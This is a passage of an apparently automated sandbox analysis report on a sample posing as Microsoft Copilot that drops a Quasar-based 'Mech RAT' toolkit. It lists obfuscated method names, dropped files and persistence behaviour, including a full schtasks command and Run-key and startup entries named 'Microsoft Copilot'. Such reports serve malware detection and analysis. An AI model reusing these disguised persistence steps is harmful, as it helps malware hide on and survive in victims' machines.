'MwHHezqwVMSNQjjljHaBml7A5yY2DrmHdQCYBX3eVMwOucmz2b2z4FzLzRNtREPUp3VezMRw9HXbwmuBye73QsF', 'RWB6kPdfXI6U1deoBZhLKOdv6VCsya4A9FnQidDywAh6d3DP70QkSqvixLFsG9Yrhns4n3ni5x4aKFRew2wA1Yq'
                    Source: Copilot.exe.0.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csHigh entropy of concatenated method names: 'bJcJPCY3g4GZB37VXKjWdykXzvKaVcspg6h2Tky5txjBt3vo0IpVM4fOzFGUuvQU0wOVdHT3roVP9VhbXJ8GP5W', 'qbixFGD30WX2pBs', 'YdqRMxdvksPO6bu', 'vafmKXXYFmdgUGo', '_32tQUhdDBDxEIwM'
                    Source: Microsoft Copilot.exe.1.dr, JROk0Eci9ENTX2os2noz7QF7om05s1eNs5Pju7pQ4InncB1gXtsCZxgYXaMKF9CalozBMWsRf.csHigh entropy of concatenated method names: 'zzz9kNPiyb347OFJGtsSWd91D8yHTr0DcPDJZuaqGMh9G7wR3ZcZ2mXzj1ovIv5lpJAhjq8Hf', 'w28s5Ov9OqqYWDPyFXgFqg63ybAsYSPVhX1dFiF4pFKh1638a5bkOXhLHduJqgR44opjpE3vi', '_8YhhV8wVsqXuGAtE2GSEM7Sj3Pv1a9NlKzRwyKgLX7pReNlBatJ5Q05paqiBHAubmwuBEWgms', 'v3HOUB0vSVfwYOs', 'kqVaN5oO22jKzuw', 'KTsJUDejD4ay42w', '_07RDr7CEnBMJyFR', '_1MFbc5OhNAEZonG', 'P9D8iU9QmyAimll', 'SQkSF9ifG7BfWqM'
                    Source: Microsoft Copilot.exe.1.dr, XeV05SAXAr6QYciyeuZVfWefpFooLA9VxSbUudYt1T43kGp8g44ScoX.csHigh entropy of concatenated method names: 'e7gShrsOowb6OBBMuQbZjGo7NiUdJQdWs7ewdeuFfxmj0O1Qq7xIsR8V0szDKqHfZnYtxyLOk', 'i1VhreKaGWaODWzwCS9IJTaJBXnSvTblkQFdctlfezJoJUY0YWyKI7vtqOczGqiG62YgXBmX3', 'FCpqa1ykUc4HCbajI5zt9f44tjtHnmcjyts6XIFfvTdCw73XstgFzu7UAvcyCC5lNleMw24Ic', 'sZoLdrIe8ju684guo2SmBLwV8i0EyDA6FkKvqBFsUN7BgRNoaUbmjyESxiJuIv69zBGoXI3Hb'
                    Source: Microsoft Copilot.exe.1.dr, 5OJs19f2uhPfUVeDxLPXHar.csHigh entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', '_54vQtaO2du4tmlhYiHsboNIAmKcIDKrwtsicsnyx5TM8XH44VKWhlt226YiJtux1LzuslUzO6', 'xY3jqEnq9kzaWTDJ2c067h0ySl9VKemkcn5DYPaXpaApus8XZn5qAyIBI4jabpSTuOAPlXh4x', '_3w8f2ytK17lQsk8bOZ3KmloYRGbY6ndDPS9ishJeMY57MSHdnowmdrCxZTgghZN8YYHKJKWx7', 'aRTy8dvPWCTwlNEmETpNBCejoJtVaga0BmXLdkXNvw5tUpRCEF4msvSkAlvjcCiRtTLLf4lgJ'
                    Source: Microsoft Copilot.exe.1.dr, 5fllQ7pqCcfYdIoqhx96LhArCojSoN2cBZDL1sFXjz7YVNsfr6AQfHO.csHigh entropy of concatenated method names: 'GDXchcMtGDkY1Vou9LYvAwf14iS5MdkdpbYOeczPReY8DRo4whLLs4y', 'EYJGL5lDkwuMliNjoq1drYzBaEX6rBXK2AKkp1mKAHboqJEoRIa4ld5', '_61ox06DpfX2PtLLtLZzpiT9L7GUWRrZLjFXndBbotM9sdgtutjYGRSg', '_4AwNxYSdSHwFOJMbp9fy4pR9YV13ciXZ76LFLH7AIHejgj2H2OEJAEj', 'VdHhYqYEYuzQvBx4H2YKkXnCMrhi2SX8Jc1S6QLyMRjCULAqucmJK7l', '_0Q57a8G3DXcwQfFS8pyBEfRDXGzjtG3LKO1hHqFvI1iPDG6AmToNpFJ', '_7lalOXRRoj63ahdWX3HMjGmtgwxBxYVhCygMId9KeaadrHjqjEO47Tv', 'l1nBJcwnAVgjhfQsEq3MZY8KqYmowdcWxtNiCs1zkIJ8sGXDuPjIcFI', 'vN6EVCZnq0d4fHLuBG2ejJ9ZgAgLRHyN2zwTQoc4YFhbCG0zuMpQpmm', '_4Vfu30y4aMEocc6AvnJMiwhbA8gAx2wkvftBh9hihRSNdGz7pSkchEF'
                    Source: Microsoft Copilot.exe.1.dr, FWvSy0HBt4L93w3YhvBwnaO76cDKBGuvijgxucfviKwytM1yzRimwLs.csHigh entropy of concatenated method names: 'Y2DzlIIVnJSnFRdxYcpmN2ErHj5Ro34Q954TsQwyda699iagsRoKgcw', 'NoJPZsRyXlX4VLHYh6JKql3rYNCh4dcK0igxeyblFJXKVr4bniJgodk', 'VJT1HOu7wvydw6VkH0CCNuFbH6L7K8pX0mGF0frZocx11ArWTiToztd', 'EkSCZMVSQnV6DlScrtHGpsvzngeX6YP6blSBEwpkoj8trokbaSU9O3h', 'QNfHtEVuQ2ymP7yzBI4G7ISPtk1vO5fsfzZ82PmDWhlvPFKUiC0ooQj', 'JM65JA1sXick4wXH48WgQlX9Xy8cDCO5Kezo3r9i71jK9BvB3yZ3TuH', 'SSuecDAkyQnK8PFW383yc3vHl9I9HgBMVxikYudDcV0aOWEWSZZdn1O', 'zpIAK1K0RwzI9fu6ymxXTfFi3X5U5e2tgEWXq32bWGIrHso89fFraAI', 'kswgLpNWEa3rrMjudOXStJTf51pJCbLs29f6tVgpPb8ovOzUOm86BE6', '_0pgx9BtiL5nLEsgywMnjeOuDJb6kgzcIFFOq8fZRSSsGcW2EFahEORW'
                    Source: Microsoft Copilot.exe.1.dr, ZIYiiDVMhvKOYrmxRtunl07Jm5X3i5kgpICkSenNgNtMVbi5BeEvi7p.csHigh entropy of concatenated method names: 'Rh8IOcOZivZ3DrlDLmNIwCsyYHXpIeYkJhJO1QVhNY3tBqg35b7x34B', 'AfdAljf2buztXsx1XiGKdNAkJrgVMTtp4EMR7uAICpcT7nqCTgca8Q8', 'P9V1Ih5rsAV6a1nikxPqNtY9N6jkVXkxW2lPdGgMUdo9lhZRTY7mv1e', 'X25xugaawcC4cTH5I1fWPQz6gzGAMTTZlljlbLrfJcK3v5xG43QKyAj', 'vCV9er41lqc62F3nmnXBywE6aS6SzVQsNadyDnd255XSX4mKLXMaZbQ', '_5vnlwydEsVRKyeSdp46qUI0eDqNoN7NhUxiDX3PqrbSpcLlMwpabjbs', 'GNwINVOMISs71IP8DwssQ1lzeFEWC0LgvzZW4pJVXY085y5qgifsg4g', 'CYfCJqeUrdpt3RyziTjTuvaSiYtTfg85SteeWEhugvkzM6Xsi0PFoB6', 'RQlnXojfaB4AsdGp9fzX0ndZXQBPQqzLVIUn2E9c9c07G9oB3bgcutU', 'pEFfV4LXwLhAXpxsm8ir9L6nGZMyVsn6bBI20ZoBv6xjA1f7iRdtLnF'
                    Source: Microsoft Copilot.exe.1.dr, B3zcabB7XoB8QXLIvPnRn2YDu9xmAE9D74ryQl5aeoExBKaOuDeqEaBwEUZtkehlmkcYuEcSIVcgJyj66csaO6q.csHigh entropy of concatenated method names: 'wd76gDubxesDbDajQMUcaXkr9pTksJZPBeuflwgSj1MDa2IQvyGjDdSv9ADZ9B6CweGvSTGSShuu5dM4QBeWG9I', 'fNgi7pPBcbsQy9237UndotP16XTPTisnfZZg8aORcJcVHgGDn3t2tW0NOXUa7UXoaHcBEpllHsp7kTiQldFbkJ7', '_7Eq7iOmpU53TTL8OHOAqqdBQz0o3ZyZ3waB5TJ00Uwgl2rc0DeB567MejLOKt9RKQOZnRy7WQ9dDLkrc7kn9Yi9', '_56N8isy8FI1GuJBl0z4C97Exkx9DmPTVhg08FgBnwD2UwJbcT7SIERrN04Ay9U8ARzDTgLxkvHNmDbQF0rCZTGM', '_5rDOO4kboCqyZPyzA2OaLmSQ3MR3CPrXR8kf87WFNwYW1IwjTSowvn26IhLEWcE9buxmmXZqQTVhySOcv1B7qr0', 'MsXc94LEFTYocjklQThny61epluqEyxDUubulPuO0jqRBLShKfjA07v3t6tOfFdmr1MyE3Dx9IhhIiJknVhUQqi', 'RXscBl8tsb4J5B3Hg3HuxHnUrbAItIsyvMVhufxjaU3xmx27h7rA5jB2azQBHcPnq6oXkQWD16BD7wLJyROp5jY', 'iegOmGxTPr28aBjTs1Bpt3gyCSgOA4ldBKs7MHbHTO59fBv6Bk2AgdwazLH2SdZfvgmu3ESMfXjVxFaaiaIP6rJ', '_9SJCwAwqP1bNJ1lxmTucjMgUJ3uVv0E3ADEgYVmlr3OYlPEH5JwxrK44d4eE3Be8DlbiVFOYB2WjaV9KRFiYlGD', '_5dLEcawLxZeFVKZjgpN3wzdhbKaPtDhQOFKyHjPR9MIFsyMgVpijXc15Wr8KIJUPqhdIITTsfWDOeicEZlxZK9o'
                    Source: Microsoft Copilot.exe.1.dr, lN9yj0DclvLFRThUfMYKKmx2hzrhxQ13n5kxy2uTP7z60LyMXNHr5aH2jqOLeRa4Pi9le3w24R6tmLaZf8rxnyC.csHigh entropy of concatenated method names: 'asG8aK4379S4LVCWeww50ZK1vccCwVCRHCQgD4Ttkcesi7hM1iBGOi0w6QJhyvNQTnOKDpqVArBx7i0J7VfZagn', 'RBotrOTrFq2SH6MOLHscsFYm1gIiFwiw49RstOzq9T2M5c8XngG9XGaDNlMOYiCh9YF8wPXEieU6ro9JXJoZGGd', 'LLvNWppYJwppCewCURVUIOv256OxJFlObOUrrbVbxQ9Jzk9Ud2Dn6sktBMc60ueRNkvbqrgZpCyznX9WES6LIDB', '_1D8H93VJcm5uLul3rV4GmDH5kBITjCt1W72fXJCWAx2mtqvEnbz2GMHGEXmUANIRcamcCVxw9bDxnN5Hn46jKWI', 'GJQCgPL0mJRNm3M', '_4MZQxFDozqVQOs0', 'dFghmN08kbr7QtI', 'wgsKqYmdAb5ZZQI', 't8GUAUDDrhNkhmv', '_2rtGFiKXxe6wvJV'
                    Source: Microsoft Copilot.exe.1.dr, 08I4HlpfZvcXgQJn6jhwLOiX5NhqxmSDMQTziisZ5tgE8NeYxznxnl0.csHigh entropy of concatenated method names: 'rkhiNPWgaENIbdkCp6mJtdOPN3mFbpQMuPwvi8kf4rGCc2X72CpsDNt', '_59bJb29T3A9eh4GP7lPhvEZDx5CXQKRkNqgJsPN3vWk8rPr3YsWN6q1FQAdkmo7JVizqwY4Bc0hhMF873KwYNxE', '_8SpLtqtxL11qXpFPX0EYNetLlM7tGh5fkVJXBWlIBPqVCCMlqqoEtdyIYiSROIRSFJUCYVze3U7GOgybQJ1GZ4B', '_3tN4sqb7XBF96eyGZbHxv1TWxurThY4vI02UIVrImdNI7ZZ3yxAw34w8MHNp44J9sS1m4qNtxWtJc6cGBgvt2ym', 'UQBh4otD5J4nlDsaVWOkC8ul68K27zQk7FVjcst0hAxOyvXHJZp1hgwAhyK8oAigDYhN5Oc9gu453aovpq1m3EQ', 'lBAkOyFN4esJnd6690p9qvYki7ULS5jkmRPFPFIvZmlkhOv8jdfX7MiLJ4mM2T8AZutZSoxVZ2GtseegPiFKjHL', 'VRPg9HqyC1arRrsr8BoK5OUv9X8pjpUTh10SPJW4GIotpLazNtgLvv04K5DmXcqBXsNNIEcxbeu9H9ZtQzd1hcm', 'ha4EUhVu1mLLH2coeWSfQZrhSfxZJDXOgv2uauPZ6fPKI8yxvygvQVk3CvudwZqQ3Wg3j4guhUTHn1zs5k0Zm9R', 'MwHHezqwVMSNQjjljHaBml7A5yY2DrmHdQCYBX3eVMwOucmz2b2z4FzLzRNtREPUp3VezMRw9HXbwmuBye73QsF', 'RWB6kPdfXI6U1deoBZhLKOdv6VCsya4A9FnQidDywAh6d3DP70QkSqvixLFsG9Yrhns4n3ni5x4aKFRew2wA1Yq'
                    Source: Microsoft Copilot.exe.1.dr, o1PUaP6qj5vEhIVxGUaUdQDcJ68N7eDS7RtJXgQQQQD6rKQdDpNHgsbQgjpqmJNSRQZ6VoSP6jCdrk7Id0L2ih4.csHigh entropy of concatenated method names: 'bJcJPCY3g4GZB37VXKjWdykXzvKaVcspg6h2Tky5txjBt3vo0IpVM4fOzFGUuvQU0wOVdHT3roVP9VhbXJ8GP5W', 'qbixFGD30WX2pBs', 'YdqRMxdvksPO6bu', 'vafmKXXYFmdgUGo', '_32tQUhdDBDxEIwM'
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.Tests.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.TestPlatform.AdapterUtilities.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.CodeCoverage.Shim.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\BouncyCastle.Crypto.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mech Server.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTest.TestAdapter.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\protobuf-net.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Rocks.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Vestris.ResourceLib.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\client.binJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\aa-DJ\Quasar.resources.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Pdb.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Open.Nat.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.TestFramework.Extensions.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Mono.Cecil.Mdb.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Microsoft.VisualStudio.TestPlatform.MSTestAdapter.PlatformServices.Interface.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Gma.System.MouseKeyHook.dllJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Guna.UI2.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile created: C:\Users\user\AppData\Local\Temp\Microsoft Copilot.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\7za.exeFile created: C:\Users\user\AppData\Local\Temp\dpt5uaov.zyd\Mech RAT\Quasar.Common.dllJump to dropped file
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeFile created: C:\Users\user\AppData\Local\Temp\Copilot.exeJump to dropped file

                    Boot Survival

                    barindex
                    Uses schtasks.exe or at.exe to add and modify task schedules
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Microsoft Copilot" /tr "C:\Users\user~1\AppData\Local\Temp\Microsoft Copilot.exe"
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Copilot.lnkJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft CopilotJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft CopilotJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PixpFUv4G7.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Copilot.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
